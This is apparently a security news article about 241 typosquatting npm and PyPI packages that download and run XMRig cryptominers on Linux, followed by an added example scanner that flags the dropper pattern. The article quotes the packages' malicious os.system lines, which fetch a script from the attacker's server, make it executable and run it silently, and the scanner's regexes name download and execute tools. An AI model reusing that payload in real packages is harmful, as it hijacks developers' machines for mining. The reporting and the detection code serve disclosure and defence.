
241 npm and PyPI packages caught dropping Linux cryptominers

By Lucinda Keatinge
August 20, 2022

More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries, and each of them downloads a Bash script that runs cryptominers on Linux systems.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but they instead download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers reported coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

[Image: 55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)]

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code, which downloads the Bash script from the threat actor’s server via the Bit.ly URL shortener.

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and whether the deployment of cryptominers succeeded.
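The following added example, which is not from the article, the researchers or either registry, statically scans Python source for the download / chmod / execute chain seen in the three os.system calls quoted above. The indicator patterns and function names are assumptions chosen for illustration; the sample input reproduces the article's defanged lines and is only parsed, never run.

```python
import ast
import re

# Heuristic traits of the quoted dropper (assumed patterns, not published signatures).
INDICATORS = {
    "download": re.compile(r"\b(wget|curl)\b"),
    "make_executable": re.compile(r"\bchmod\s+\+x\b"),
    "run_local_file": re.compile(r"^\s*(sudo\s+)?\./\S+"),
    "hidden_file": re.compile(r"(^|[\s/])\.[A-Za-z0-9_]+(\s|$)"),
    "silenced": re.compile(r">\s*/dev/null"),
    "sudo": re.compile(r"\bsudo\b"),
}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output"}


def shell_commands(source):
    """Yield (line, command) for shell-execution calls with a literal string argument."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and node.args:
            name = ast.unparse(node.func)  # e.g. "os.system"
            arg = node.args[0]
            if name in SHELL_CALLS and isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                yield node.lineno, arg.value


def scan(source):
    """Return (findings, dropper): tagged lines, and whether the full chain is present."""
    findings = []
    for line, cmd in sorted(shell_commands(source)):
        tags = sorted(k for k, rx in INDICATORS.items() if rx.search(cmd))
        if tags:
            findings.append((line, tags))
    seen = {t for _, tags in findings for t in tags}
    dropper = {"download", "make_executable", "run_local_file"} <= seen
    return findings, dropper


# The article's quoted lines, URL still defanged; parsed as text only.
SAMPLE = '''import os
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
'''

if __name__ == "__main__":
    for line, tags in scan(SAMPLE)[0]:
        print(f"line {line}: {', '.join(tags)}")
    print("dropper chain:", scan(SAMPLE)[1])
```

A single download call on its own is reported but does not set the dropper flag; only the combination of download, chmod +x and execution of a local file does.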

At the time of writing, we observed that the IP address was down. However, BleepingComputer was able to obtain a copy of the script, and we can confirm the researcher’s claims:

[Image: Excerpt from Bash script installing cryptominers (BleepingComputer)]

The Sonatype security research team, which I’m a part of, today disclosed another 186 npm typosquatting packages that contact the same URL to download the malicious Bash script.

[Image: npm packages pull malicious code from the same URL (Sonatype)]

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing setup.py), it seems the open source repositories’ race against threat actors is only getting more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that, once again, exploited typosquatting to infect developers.




